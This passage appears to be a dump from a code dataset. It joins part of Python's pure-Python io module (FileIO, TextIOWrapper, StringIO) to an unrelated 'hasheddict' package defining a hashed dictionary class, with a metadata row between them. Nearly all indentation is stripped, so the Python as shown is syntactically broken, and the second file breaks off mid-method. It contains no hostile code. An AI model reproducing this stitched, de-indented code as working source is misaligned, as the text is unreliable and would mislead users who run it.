flags |= noinherit_flag
owned_fd = None
try:
if fd < 0:
if not closefd:
raise ValueError('Cannot use closefd=False with file name')
if opener is None:
fd = os.open(file, flags, 0o666)
else:
fd = opener(file, flags)
if not isinstance(fd, int):
raise TypeError('expected integer from opener')
if fd < 0:
raise OSError('Negative file descriptor')
owned_fd = fd
if not noinherit_flag:
os.set_inheritable(fd, False)
self._closefd = closefd
fdfstat = os.fstat(fd)
try:
if stat.S_ISDIR(fdfstat.st_mode):
raise IsADirectoryError(errno.EISDIR,
os.strerror(errno.EISDIR), file)
except AttributeError:
                # Ignore the AttributeError if stat.S_ISDIR or errno.EISDIR
# don't exist.
pass
self._blksize = getattr(fdfstat, 'st_blksize', 0)
if self._blksize <= 1:
self._blksize = DEFAULT_BUFFER_SIZE
if _setmode:
# don't translate newlines (\r\n <=> \n)
_setmode(fd, os.O_BINARY)
self.name = file
if self._appending:
# For consistent behaviour, we explicitly seek to the
# end of file (otherwise, it might be done only on the
# first write()).
os.lseek(fd, 0, SEEK_END)
except:
if owned_fd is not None:
os.close(owned_fd)
raise
self._fd = fd
def __del__(self):
if self._fd >= 0 and self._closefd and not self.closed:
import warnings
warnings.warn('unclosed file %r' % (self,), ResourceWarning,
stacklevel=2, source=self)
self.close()
def __getstate__(self):
raise TypeError(f"cannot pickle {self.__class__.__name__!r} object")
def __repr__(self):
class_name = '%s.%s' % (self.__class__.__module__,
self.__class__.__qualname__)
if self.closed:
return '<%s [closed]>' % class_name
try:
name = self.name
except AttributeError:
return ('<%s fd=%d mode=%r closefd=%r>' %
(class_name, self._fd, self.mode, self._closefd))
else:
return ('<%s name=%r mode=%r closefd=%r>' %
(class_name, name, self.mode, self._closefd))
def _checkReadable(self):
if not self._readable:
raise UnsupportedOperation('File not open for reading')
def _checkWritable(self, msg=None):
if not self._writable:
raise UnsupportedOperation('File not open for writing')
def read(self, size=None):
"""Read at most size bytes, returned as bytes.
        Only makes one system call, so less data may be returned than requested.
In non-blocking mode, returns None if no data is available.
Return an empty bytes object at EOF.
"""
self._checkClosed()
self._checkReadable()
if size is None or size < 0:
return self.readall()
try:
return os.read(self._fd, size)
except BlockingIOError:
return None
def readall(self):
"""Read all data from the file, returned as bytes.
In non-blocking mode, returns as much as is immediately available,
or None if no data is available. Return an empty bytes object at EOF.
"""
self._checkClosed()
self._checkReadable()
bufsize = DEFAULT_BUFFER_SIZE
try:
pos = os.lseek(self._fd, 0, SEEK_CUR)
end = os.fstat(self._fd).st_size
if end >= pos:
bufsize = end - pos + 1
except OSError:
pass
result = bytearray()
while True:
if len(result) >= bufsize:
bufsize = len(result)
bufsize += max(bufsize, DEFAULT_BUFFER_SIZE)
n = bufsize - len(result)
try:
chunk = os.read(self._fd, n)
except BlockingIOError:
if result:
break
return None
if not chunk: # reached the end of the file
break
result += chunk
return bytes(result)
def readinto(self, b):
"""Same as RawIOBase.readinto()."""
m = memoryview(b).cast('B')
data = self.read(len(m))
n = len(data)
m[:n] = data
return n
def write(self, b):
"""Write bytes b to file, return number written.
Only makes one system call, so not all of the data may be written.
The number of bytes actually written is returned. In non-blocking mode,
returns None if the write would block.
"""
self._checkClosed()
self._checkWritable()
try:
return os.write(self._fd, b)
except BlockingIOError:
return None
def seek(self, pos, whence=SEEK_SET):
"""Move to new file position.
Argument offset is a byte count. Optional argument whence defaults to
SEEK_SET or 0 (offset from start of file, offset should be >= 0); other values
are SEEK_CUR or 1 (move relative to current position, positive or negative),
and SEEK_END or 2 (move relative to end of file, usually negative, although
many platforms allow seeking beyond the end of a file).
Note that not all file objects are seekable.
"""
if isinstance(pos, float):
raise TypeError('an integer is required')
self._checkClosed()
return os.lseek(self._fd, pos, whence)
def tell(self):
"""tell() -> int. Current file position.
Can raise OSError for non seekable files."""
self._checkClosed()
return os.lseek(self._fd, 0, SEEK_CUR)
def truncate(self, size=None):
"""Truncate the file to at most size bytes.
Size defaults to the current file position, as returned by tell().
The current file position is changed to the value of size.
"""
self._checkClosed()
self._checkWritable()
if size is None:
size = self.tell()
os.ftruncate(self._fd, size)
return size
def close(self):
"""Close the file.
A closed file cannot be used for further I/O operations. close() may be
called more than once without error.
"""
if not self.closed:
try:
if self._closefd:
os.close(self._fd)
finally:
super().close()
def seekable(self):
"""True if file supports random-access."""
self._checkClosed()
if self._seekable is None:
try:
self.tell()
except OSError:
self._seekable = False
else:
self._seekable = True
return self._seekable
def readable(self):
"""True if file was opened in a read mode."""
self._checkClosed()
return self._readable
def writable(self):
"""True if file was opened in a write mode."""
self._checkClosed()
return self._writable
def fileno(self):
"""Return the underlying file descriptor (an integer)."""
self._checkClosed()
return self._fd
def isatty(self):
"""True if the file is connected to a TTY device."""
self._checkClosed()
return os.isatty(self._fd)
@property
def closefd(self):
"""True if the file descriptor will be closed by close()."""
return self._closefd
@property
def mode(self):
"""String giving the file mode"""
if self._created:
if self._readable:
return 'xb+'
else:
return 'xb'
elif self._appending:
if self._readable:
return 'ab+'
else:
return 'ab'
elif self._readable:
if self._writable:
return 'rb+'
else:
return 'rb'
else:
return 'wb'
class TextIOBase(IOBase):
"""Base class for text I/O.
This class provides a character and line based interface to stream
I/O. There is no public constructor.
"""
def read(self, size=-1):
"""Read at most size characters from stream, where size is an int.
Read from underlying buffer until we have size characters or we hit EOF.
If size is negative or omitted, read until EOF.
Returns a string.
"""
self._unsupported("read")
def write(self, s):
"""Write string s to stream and returning an int."""
self._unsupported("write")
def truncate(self, pos=None):
"""Truncate size to pos, where pos is an int."""
self._unsupported("truncate")
def readline(self):
"""Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
self._unsupported("readline")
def detach(self):
"""
Separate the underlying buffer from the TextIOBase and return it.
After the underlying buffer has been detached, the TextIO is in an
unusable state.
"""
self._unsupported("detach")
@property
def encoding(self):
"""Subclasses should override."""
return None
@property
def newlines(self):
"""Line endings translated so far.
Only line endings translated during reading are considered.
Subclasses should override.
"""
return None
@property
def errors(self):
"""Error setting of the decoder or encoder.
Subclasses should override."""
return None
io.TextIOBase.register(TextIOBase)
class IncrementalNewlineDecoder(codecs.IncrementalDecoder):
r"""Codec used when reading a file in universal newlines mode. It wraps
another incremental decoder, translating \r\n and \r into \n. It also
records the types of newlines encountered. When used with
translate=False, it ensures that the newline sequence is returned in
one piece.
"""
def __init__(self, decoder, translate, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors=errors)
self.translate = translate
self.decoder = decoder
self.seennl = 0
self.pendingcr = False
def decode(self, input, final=False):
# decode input (with the eventual \r from a previous pass)
if self.decoder is None:
output = input
else:
output = self.decoder.decode(input, final=final)
if self.pendingcr and (output or final):
output = "\r" + output
self.pendingcr = False
# retain last \r even when not translating data:
# then readline() is sure to get \r\n in one pass
if output.endswith("\r") and not final:
output = output[:-1]
self.pendingcr = True
# Record which newlines are read
crlf = output.count('\r\n')
cr = output.count('\r') - crlf
lf = output.count('\n') - crlf
self.seennl |= (lf and self._LF) | (cr and self._CR) \
| (crlf and self._CRLF)
if self.translate:
if crlf:
output = output.replace("\r\n", "\n")
if cr:
output = output.replace("\r", "\n")
return output
def getstate(self):
if self.decoder is None:
buf = b""
flag = 0
else:
buf, flag = self.decoder.getstate()
flag <<= 1
if self.pendingcr:
flag |= 1
return buf, flag
def setstate(self, state):
buf, flag = state
self.pendingcr = bool(flag & 1)
if self.decoder is not None:
self.decoder.setstate((buf, flag >> 1))
def reset(self):
self.seennl = 0
self.pendingcr = False
if self.decoder is not None:
self.decoder.reset()
_LF = 1
_CR = 2
_CRLF = 4
@property
def newlines(self):
return (None,
"\n",
"\r",
("\r", "\n"),
"\r\n",
("\n", "\r\n"),
("\r", "\r\n"),
("\r", "\n", "\r\n")
)[self.seennl]
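# Illustrative sketch (added comment, not part of the original module): how the
# incremental decoder above behaves when data arrives in pieces, with
# translate=True and no wrapped decoder.
#
#     dec = IncrementalNewlineDecoder(decoder=None, translate=True)
#     dec.decode("a\r")      # -> "a"       (the trailing "\r" is held back)
#     dec.decode("\nb\n")    # -> "\nb\n"   (the pending "\r\n" collapses to "\n")
#     dec.newlines           # -> ("\n", "\r\n")  (both kinds have been seen)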
class TextIOWrapper(TextIOBase):
r"""Character and line based layer over a BufferedIOBase object, buffer.
encoding gives the name of the encoding that the stream will be
decoded or encoded with. It defaults to locale.getpreferredencoding(False).
errors determines the strictness of encoding and decoding (see the
codecs.register) and defaults to "strict".
newline can be None, '', '\n', '\r', or '\r\n'. It controls the
handling of line endings. If it is None, universal newlines is
enabled. With this enabled, on input, the lines endings '\n', '\r',
or '\r\n' are translated to '\n' before being returned to the
caller. Conversely, on output, '\n' is translated to the system
default line separator, os.linesep. If newline is any other of its
legal values, that newline becomes the newline when the file is read
and it is returned untranslated. On output, '\n' is converted to the
newline.
If line_buffering is True, a call to flush is implied when a call to
write contains a newline character.
"""
_CHUNK_SIZE = 2048
# Initialize _buffer as soon as possible since it's used by __del__()
# which calls close()
_buffer = None
# The write_through argument has no effect here since this
# implementation always writes through. The argument is present only
# so that the signature can match the signature of the C version.
def __init__(self, buffer, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
self._check_newline(newline)
if encoding is None:
try:
encoding = os.device_encoding(buffer.fileno())
except (AttributeError, UnsupportedOperation):
pass
if encoding is None:
try:
import locale
except ImportError:
# Importing locale may fail if Python is being built
encoding = "ascii"
else:
encoding = locale.getpreferredencoding(False)
if not isinstance(encoding, str):
raise ValueError("invalid encoding: %r" % encoding)
if not codecs.lookup(encoding)._is_text_encoding:
msg = ("%r is not a text encoding; "
"use codecs.open() to handle arbitrary codecs")
raise LookupError(msg % encoding)
if errors is None:
errors = "strict"
else:
if not isinstance(errors, str):
raise ValueError("invalid errors: %r" % errors)
self._buffer = buffer
self._decoded_chars = '' # buffer for text returned from decoder
self._decoded_chars_used = 0 # offset into _decoded_chars for read()
self._snapshot = None # info for reconstructing decoder state
self._seekable = self._telling = self.buffer.seekable()
self._has_read1 = hasattr(self.buffer, 'read1')
self._configure(encoding, errors, newline,
line_buffering, write_through)
def _check_newline(self, newline):
if newline is not None and not isinstance(newline, str):
raise TypeError("illegal newline type: %r" % (type(newline),))
if newline not in (None, "", "\n", "\r", "\r\n"):
raise ValueError("illegal newline value: %r" % (newline,))
def _configure(self, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
self._encoding = encoding
self._errors = errors
self._encoder = None
self._decoder = None
self._b2cratio = 0.0
self._readuniversal = not newline
self._readtranslate = newline is None
self._readnl = newline
self._writetranslate = newline != ''
self._writenl = newline or os.linesep
self._line_buffering = line_buffering
self._write_through = write_through
# don't write a BOM in the middle of a file
if self._seekable and self.writable():
position = self.buffer.tell()
if position != 0:
try:
self._get_encoder().setstate(0)
except LookupError:
# Sometimes the encoder doesn't exist
pass
# self._snapshot is either None, or a tuple (dec_flags, next_input)
# where dec_flags is the second (integer) item of the decoder state
# and next_input is the chunk of input bytes that comes next after the
# snapshot point. We use this to reconstruct decoder states in tell().
# Naming convention:
# - "bytes_..." for integer variables that count input bytes
# - "chars_..." for integer variables that count decoded characters
def __repr__(self):
result = "<{}.{}".format(self.__class__.__module__,
self.__class__.__qualname__)
try:
name = self.name
except AttributeError:
pass
else:
result += " name={0!r}".format(name)
try:
mode = self.mode
except AttributeError:
pass
else:
result += " mode={0!r}".format(mode)
return result + " encoding={0!r}>".format(self.encoding)
@property
def encoding(self):
return self._encoding
@property
def errors(self):
return self._errors
@property
def line_buffering(self):
return self._line_buffering
@property
def write_through(self):
return self._write_through
@property
def buffer(self):
return self._buffer
def reconfigure(self, *,
encoding=None, errors=None, newline=Ellipsis,
line_buffering=None, write_through=None):
"""Reconfigure the text stream with new parameters.
This also flushes the stream.
"""
if (self._decoder is not None
and (encoding is not None or errors is not None
or newline is not Ellipsis)):
raise UnsupportedOperation(
"It is not possible to set the encoding or newline of stream "
"after the first read")
if errors is None:
if encoding is None:
errors = self._errors
else:
errors = 'strict'
elif not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
if encoding is None:
encoding = self._encoding
else:
if not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if newline is Ellipsis:
newline = self._readnl
self._check_newline(newline)
if line_buffering is None:
line_buffering = self.line_buffering
if write_through is None:
write_through = self.write_through
self.flush()
self._configure(encoding, errors, newline,
line_buffering, write_through)
def seekable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return self._seekable
def readable(self):
return self.buffer.readable()
def writable(self):
return self.buffer.writable()
def flush(self):
self.buffer.flush()
self._telling = self._seekable
def close(self):
if self.buffer is not None and not self.closed:
try:
self.flush()
finally:
self.buffer.close()
@property
def closed(self):
return self.buffer.closed
@property
def name(self):
return self.buffer.name
def fileno(self):
return self.buffer.fileno()
def isatty(self):
return self.buffer.isatty()
def write(self, s):
'Write data, where s is a str'
if self.closed:
raise ValueError("write to closed file")
if not isinstance(s, str):
raise TypeError("can't write %s to text stream" %
s.__class__.__name__)
length = len(s)
haslf = (self._writetranslate or self._line_buffering) and "\n" in s
if haslf and self._writetranslate and self._writenl != "\n":
s = s.replace("\n", self._writenl)
encoder = self._encoder or self._get_encoder()
# XXX What if we were just reading?
b = encoder.encode(s)
self.buffer.write(b)
if self._line_buffering and (haslf or "\r" in s):
self.flush()
self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
return length
def _get_encoder(self):
make_encoder = codecs.getincrementalencoder(self._encoding)
self._encoder = make_encoder(self._errors)
return self._encoder
def _get_decoder(self):
make_decoder = codecs.getincrementaldecoder(self._encoding)
decoder = make_decoder(self._errors)
if self._readuniversal:
decoder = IncrementalNewlineDecoder(decoder, self._readtranslate)
self._decoder = decoder
return decoder
# The following three methods implement an ADT for _decoded_chars.
# Text returned from the decoder is buffered here until the client
# requests it by calling our read() or readline() method.
def _set_decoded_chars(self, chars):
"""Set the _decoded_chars buffer."""
self._decoded_chars = chars
self._decoded_chars_used = 0
def _get_decoded_chars(self, n=None):
"""Advance into the _decoded_chars buffer."""
offset = self._decoded_chars_used
if n is None:
chars = self._decoded_chars[offset:]
else:
chars = self._decoded_chars[offset:offset + n]
self._decoded_chars_used += len(chars)
return chars
def _rewind_decoded_chars(self, n):
"""Rewind the _decoded_chars buffer."""
if self._decoded_chars_used < n:
raise AssertionError("rewind decoded_chars out of bounds")
self._decoded_chars_used -= n
def _read_chunk(self):
"""
Read and decode the next chunk of data from the BufferedReader.
"""
# The return value is True unless EOF was reached. The decoded
# string is placed in self._decoded_chars (replacing its previous
# value). The entire input chunk is sent to the decoder, though
# some of it may remain buffered in the decoder, yet to be
# converted.
if self._decoder is None:
raise ValueError("no decoder")
if self._telling:
# To prepare for tell(), we need to snapshot a point in the
# file where the decoder's input buffer is empty.
dec_buffer, dec_flags = self._decoder.getstate()
# Given this, we know there was a valid snapshot point
# len(dec_buffer) bytes ago with decoder state (b'', dec_flags).
# Read a chunk, decode it, and put the result in self._decoded_chars.
if self._has_read1:
input_chunk = self.buffer.read1(self._CHUNK_SIZE)
else:
input_chunk = self.buffer.read(self._CHUNK_SIZE)
eof = not input_chunk
decoded_chars = self._decoder.decode(input_chunk, eof)
self._set_decoded_chars(decoded_chars)
if decoded_chars:
self._b2cratio = len(input_chunk) / len(self._decoded_chars)
else:
self._b2cratio = 0.0
if self._telling:
# At the snapshot point, len(dec_buffer) bytes before the read,
# the next input to be decoded is dec_buffer + input_chunk.
self._snapshot = (dec_flags, dec_buffer + input_chunk)
return not eof
def _pack_cookie(self, position, dec_flags=0,
bytes_to_feed=0, need_eof=0, chars_to_skip=0):
# The meaning of a tell() cookie is: seek to position, set the
# decoder flags to dec_flags, read bytes_to_feed bytes, feed them
# into the decoder with need_eof as the EOF flag, then skip
# chars_to_skip characters of the decoded result. For most simple
# decoders, tell() will often just give a byte offset in the file.
return (position | (dec_flags<<64) | (bytes_to_feed<<128) |
(chars_to_skip<<192) | bool(need_eof)<<256)
def _unpack_cookie(self, bigint):
rest, position = divmod(bigint, 1<<64)
rest, dec_flags = divmod(rest, 1<<64)
rest, bytes_to_feed = divmod(rest, 1<<64)
need_eof, chars_to_skip = divmod(rest, 1<<64)
return position, dec_flags, bytes_to_feed, need_eof, chars_to_skip
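    # Worked illustration (added comment; the numbers are hypothetical): each
    # field occupies its own 64-bit slot counted from the low end, so
    #     _pack_cookie(position=10, dec_flags=1, bytes_to_feed=3,
    #                  need_eof=0, chars_to_skip=2)
    # returns 10 | (1 << 64) | (3 << 128) | (2 << 192), and _unpack_cookie()
    # recovers (10, 1, 3, 0, 2) by repeated divmod with 1 << 64.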
def tell(self):
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if not self._telling:
raise OSError("telling position disabled by next() call")
self.flush()
position = self.buffer.tell()
decoder = self._decoder
if decoder is None or self._snapshot is None:
if self._decoded_chars:
# This should never happen.
raise AssertionError("pending decoded text")
return position
# Skip backward to the snapshot point (see _read_chunk).
dec_flags, next_input = self._snapshot
position -= len(next_input)
# How many decoded characters have been used up since the snapshot?
chars_to_skip = self._decoded_chars_used
if chars_to_skip == 0:
# We haven't moved from the snapshot point.
return self._pack_cookie(position, dec_flags)
# Starting from the snapshot position, we will walk the decoder
# forward until it gives us enough decoded characters.
saved_state = decoder.getstate()
try:
# Fast search for an acceptable start point, close to our
# current pos.
# Rationale: calling decoder.decode() has a large overhead
# regardless of chunk size; we want the number of such calls to
# be O(1) in most situations (common decoders, sensible input).
# Actually, it will be exactly 1 for fixed-size codecs (all
# 8-bit codecs, also UTF-16 and UTF-32).
skip_bytes = int(self._b2cratio * chars_to_skip)
skip_back = 1
assert skip_bytes <= len(next_input)
while skip_bytes > 0:
decoder.setstate((b'', dec_flags))
                # Decode up to tentative start point
n = len(decoder.decode(next_input[:skip_bytes]))
if n <= chars_to_skip:
b, d = decoder.getstate()
if not b:
# Before pos and no bytes buffered in decoder => OK
dec_flags = d
chars_to_skip -= n
break
# Skip back by buffered amount and reset heuristic
skip_bytes -= len(b)
skip_back = 1
else:
# We're too far ahead, skip back a bit
skip_bytes -= skip_back
skip_back = skip_back * 2
else:
skip_bytes = 0
decoder.setstate((b'', dec_flags))
# Note our initial start point.
start_pos = position + skip_bytes
start_flags = dec_flags
if chars_to_skip == 0:
# We haven't moved from the start point.
return self._pack_cookie(start_pos, start_flags)
# Feed the decoder one byte at a time. As we go, note the
# nearest "safe start point" before the current location
# (a point where the decoder has nothing buffered, so seek()
# can safely start from there and advance to this location).
bytes_fed = 0
need_eof = 0
# Chars decoded since `start_pos`
chars_decoded = 0
for i in range(skip_bytes, len(next_input)):
bytes_fed += 1
chars_decoded += len(decoder.decode(next_input[i:i+1]))
dec_buffer, dec_flags = decoder.getstate()
if not dec_buffer and chars_decoded <= chars_to_skip:
# Decoder buffer is empty, so this is a safe start point.
start_pos += bytes_fed
chars_to_skip -= chars_decoded
start_flags, bytes_fed, chars_decoded = dec_flags, 0, 0
if chars_decoded >= chars_to_skip:
break
else:
# We didn't get enough decoded data; signal EOF to get more.
chars_decoded += len(decoder.decode(b'', final=True))
need_eof = 1
if chars_decoded < chars_to_skip:
raise OSError("can't reconstruct logical file position")
# The returned cookie corresponds to the last safe start point.
return self._pack_cookie(
start_pos, start_flags, bytes_fed, need_eof, chars_to_skip)
finally:
decoder.setstate(saved_state)
def truncate(self, pos=None):
self.flush()
if pos is None:
pos = self.tell()
return self.buffer.truncate(pos)
def detach(self):
if self.buffer is None:
raise ValueError("buffer is already detached")
self.flush()
buffer = self._buffer
self._buffer = None
return buffer
def seek(self, cookie, whence=0):
def _reset_encoder(position):
"""Reset the encoder (merely useful for proper BOM handling)"""
try:
encoder = self._encoder or self._get_encoder()
except LookupError:
# Sometimes the encoder doesn't exist
pass
else:
if position != 0:
encoder.setstate(0)
else:
encoder.reset()
if self.closed:
raise ValueError("tell on closed file")
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if whence == SEEK_CUR:
if cookie != 0:
raise UnsupportedOperation("can't do nonzero cur-relative seeks")
# Seeking to the current position should attempt to
# sync the underlying buffer with the current position.
whence = 0
cookie = self.tell()
elif whence == SEEK_END:
if cookie != 0:
raise UnsupportedOperation("can't do nonzero end-relative seeks")
self.flush()
position = self.buffer.seek(0, whence)
self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
_reset_encoder(position)
return position
if whence != 0:
raise ValueError("unsupported whence (%r)" % (whence,))
if cookie < 0:
raise ValueError("negative seek position %r" % (cookie,))
self.flush()
# The strategy of seek() is to go back to the safe start point
# and replay the effect of read(chars_to_skip) from there.
start_pos, dec_flags, bytes_to_feed, need_eof, chars_to_skip = \
self._unpack_cookie(cookie)
# Seek back to the safe start point.
self.buffer.seek(start_pos)
self._set_decoded_chars('')
self._snapshot = None
# Restore the decoder to its state from the safe start point.
if cookie == 0 and self._decoder:
self._decoder.reset()
elif self._decoder or dec_flags or chars_to_skip:
self._decoder = self._decoder or self._get_decoder()
self._decoder.setstate((b'', dec_flags))
self._snapshot = (dec_flags, b'')
if chars_to_skip:
# Just like _read_chunk, feed the decoder and save a snapshot.
input_chunk = self.buffer.read(bytes_to_feed)
self._set_decoded_chars(
self._decoder.decode(input_chunk, need_eof))
self._snapshot = (dec_flags, input_chunk)
# Skip chars_to_skip of the decoded characters.
if len(self._decoded_chars) < chars_to_skip:
raise OSError("can't restore logical file position")
self._decoded_chars_used = chars_to_skip
_reset_encoder(cookie)
return cookie
def read(self, size=None):
self._checkReadable()
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
decoder = self._decoder or self._get_decoder()
if size < 0:
# Read everything.
result = (self._get_decoded_chars() +
decoder.decode(self.buffer.read(), final=True))
self._set_decoded_chars('')
self._snapshot = None
return result
else:
# Keep reading chunks until we have size characters to return.
eof = False
result = self._get_decoded_chars(size)
while len(result) < size and not eof:
eof = not self._read_chunk()
result += self._get_decoded_chars(size - len(result))
return result
def __next__(self):
self._telling = False
line = self.readline()
if not line:
self._snapshot = None
self._telling = self._seekable
raise StopIteration
return line
def readline(self, size=None):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
# Grab all the decoded text (we will rewind any extra bits later).
line = self._get_decoded_chars()
start = 0
# Make the decoder if it doesn't already exist.
if not self._decoder:
self._get_decoder()
pos = endpos = None
while True:
if self._readtranslate:
# Newlines are already translated, only search for \n
pos = line.find('\n', start)
if pos >= 0:
endpos = pos + 1
break
else:
start = len(line)
elif self._readuniversal:
# Universal newline search. Find any of \r, \r\n, \n
# The decoder ensures that \r\n are not split in two pieces
# In C we'd look for these in parallel of course.
nlpos = line.find("\n", start)
crpos = line.find("\r", start)
if crpos == -1:
if nlpos == -1:
# Nothing found
start = len(line)
else:
# Found \n
endpos = nlpos + 1
break
elif nlpos == -1:
# Found lone \r
endpos = crpos + 1
break
elif nlpos < crpos:
# Found \n
endpos = nlpos + 1
break
elif nlpos == crpos + 1:
# Found \r\n
endpos = crpos + 2
break
else:
# Found \r
endpos = crpos + 1
break
else:
# non-universal
pos = line.find(self._readnl)
if pos >= 0:
endpos = pos + len(self._readnl)
break
if size >= 0 and len(line) >= size:
endpos = size # reached length size
break
            # No line ending seen yet - get more data
while self._read_chunk():
if self._decoded_chars:
break
if self._decoded_chars:
line += self._get_decoded_chars()
else:
# end of file
self._set_decoded_chars('')
self._snapshot = None
return line
if size >= 0 and endpos > size:
endpos = size # don't exceed size
# Rewind _decoded_chars to just after the line ending we found.
self._rewind_decoded_chars(len(line) - endpos)
return line[:endpos]
@property
def newlines(self):
return self._decoder.newlines if self._decoder else None
class StringIO(TextIOWrapper):
"""Text I/O implementation using an in-memory buffer.
The initial_value argument sets the value of object. The newline
argument is like the one of TextIOWrapper's constructor.
"""
def __init__(self, initial_value="", newline="\n"):
super(StringIO, self).__init__(BytesIO(),
encoding="utf-8",
errors="surrogatepass",
newline=newline)
# Issue #5645: make universal newlines semantics the same as in the
# C version, even under Windows.
if newline is None:
self._writetranslate = False
if initial_value is not None:
if not isinstance(initial_value, str):
raise TypeError("initial_value must be str or None, not {0}"
.format(type(initial_value).__name__))
self.write(initial_value)
self.seek(0)
def getvalue(self):
self.flush()
decoder = self._decoder or self._get_decoder()
old_state = decoder.getstate()
decoder.reset()
try:
return decoder.decode(self.buffer.getvalue(), final=True)
finally:
decoder.setstate(old_state)
def __repr__(self):
# TextIOWrapper tells the encoding in its repr. In StringIO,
# that's an implementation detail.
return object.__repr__(self)
@property
def errors(self):
return None
@property
def encoding(self):
return None
def detach(self):
# This doesn't make sense on StringIO.
self._unsupported("detach")
| apache-2.0 | 3,254,690,779,113,176,000 | 33.70235 | 86 | 0.567581 | false | 4.483711 | false | false | false |
JoEiner/hasheddict | hasheddict/__init__.py | 1 | 10088 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from zlib import crc32
from hashlib import sha256
from math import log, ceil
import collections
import threading
__all__ = ['HashedDict']
__version__ = "0.1.0"
__author__ = "Johannes Schreiner, [email protected]"
__credits__ = ["Johannes Schreiner"]
__url__ = "https://github.com/JoEiner/hasheddict"
__copyright__ = "(c) 2015 Johannes Schreiner"
__license__ = "GNU General Public License v3 or later (GPLv3+)"
class HashedDict(dict):
"""
A dictionary that provides cryptographic hashes of its contents.
See package documentation for usage instructions.
"""
def __init__(self, *args, **kwargs):
"""
Possible ways of instantiation:
HashedDict([algorithm[, trees_cache_size], ])
HashedDict([algorithm[, trees_cache_size], ]**kwargs)
HashedDict([algorithm[, trees_cache_size], ]iterable, **kwargs)
HashedDict([algorithm[, trees_cache_size], ]mapping, **kwargs)
@param algorithm: algorithm is a class that provides an interface
similar to hashlib.sha*() interface (see Lib/hashlib.py)
@type trees_cache_size: int
@param trees_cache_size: The number of internal trees the HashedDict buffers.
Raising this number increases memory usage, yet reduces
time consumption when the dictionary grows over its boundaries
Use only positive integers.
Examples::
        >>> a = HashedDict(one=1, two=2, three=3)
        >>> b = HashedDict(zip(['one', 'two', 'three'], [1, 2, 3]))
        >>> c = HashedDict([('two', 2), ('one', 1), ('three', 3)])
        >>> d = HashedDict({'three': 3, 'one': 1, 'two': 2})
        >>> from hashlib import md5, sha512
        >>> e = HashedDict(md5, one=1, two=2, three=3)
        >>> f = HashedDict(sha512, 1, zip(range(100000), reversed(range(100000))))
"""
dictargs = [arg for arg in args if isinstance(arg, collections.Iterable) or
isinstance(arg, collections.Mapping)]
if len(dictargs) > 1:
raise TypeError("HashedDict expected at most 1 iterable or mapping "
"argument, got %d" % len(args))
hashargs = [arg for arg in args if not isinstance(arg, collections.Iterable) and
not isinstance(arg, collections.Mapping)]
        # pick the hash algorithm and cache size from the non-iterable
        # positional arguments, so an iterable/mapping passed first is not
        # mistaken for the algorithm
        self.__hashalg = hashargs[0] if len(hashargs) >= 1 else sha256
        self.__trees_cache_size = hashargs[1] if len(hashargs) >= 2 else 3
self.__key_to_hash = dict()
depth = self.__get_depth_for_length(0)
initial_tree = HashTree(self.__key_to_hash, self.__hashalg, depth)
initial_tree.start()
initial_tree.join()
self.__trees = {depth: initial_tree}
self.update(*dictargs, **kwargs)
def get_hash(self):
tree_nr = self.__get_depth_for_length(len(self))
return self.__trees[tree_nr].get_hash()
    def __setitem__(self, key, value):
        hash_value = self.__hash_item(key, value)
        if key in self:
            # drop the hash of the previous value first; otherwise the stale
            # hash would remain in the leaves after an overwrite
            old_hash = self.__key_to_hash[key]
            for tree in self.__trees.itervalues():
                tree.delete(key, old_hash)
        self.__key_to_hash[key] = hash_value
        super(HashedDict, self).__setitem__(key, value)
        for tree in self.__trees.itervalues():
            tree.add(key, hash_value)
self.__manage_cached_trees()
def __delitem__(self, key):
self.__manage_cached_trees()
for tree in self.__trees.itervalues():
tree.delete(key, self.__key_to_hash[key])
del self.__key_to_hash[key]
super(HashedDict, self).__delitem__(key)
def update(self, *args, **kwargs):
if args:
if len(args) > 1:
raise TypeError("update expected at most 1 arguments, "
"got %d" % len(args))
other = dict(args[0])
for key in other:
self[key] = other[key]
for key in kwargs:
self[key] = kwargs[key]
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def __manage_cached_trees(self):
dict_length = len(self)
curr_depth = self.__get_depth_for_length(dict_length)
range_start = max(0, curr_depth - (self.__trees_cache_size/2))
range_end = range_start + self.__trees_cache_size
allowed_trees = set(xrange(range_start, range_end))
existing_trees = set(self.__trees.keys())
deprecated_keys = existing_trees - allowed_trees
new_keys = allowed_trees - existing_trees
for tree_key in deprecated_keys:
del self.__trees[tree_key]
for tree_key in new_keys:
new_tree = HashTree(self.__key_to_hash,
self.__hashalg, tree_key)
new_tree.start()
self.__trees[tree_key] = new_tree
@staticmethod
def __get_depth_for_length(length):
if length == 0:
return 0
else:
return int(ceil(log(length, 2)))
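    # Worked example for __get_depth_for_length above (added comment): a dict
    # holding 5 items gives ceil(log(5, 2)) == 3, i.e. a hash tree with
    # 2**3 == 8 leaf buckets; an empty dict maps to depth 0 (a single leaf).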
def __hash_item(self, key, value):
return (self.__hashalg(self.__hashalg(repr(key)).digest() +
self.__hashalg(repr(value)).digest()).digest())
class HashTree(threading.Thread):
def __init__(self, key_to_hash, hashalg, tree_depth):
threading.Thread.__init__(self)
self.__key_to_hash = key_to_hash.copy()
self.__tree_depth = tree_depth
self.__hashalg = hashalg
def run(self):
self.__tree = self.__build_tree()
self.__leaf_hashes = self.__build_leaf_items()
self.__rehash_all()
def get_hash(self):
self.join()
return self.__tree[0][0]
def add(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
self.__leaf_hashes[position].append(hash_value)
self.__rehash(position)
def delete(self, key, hash_value):
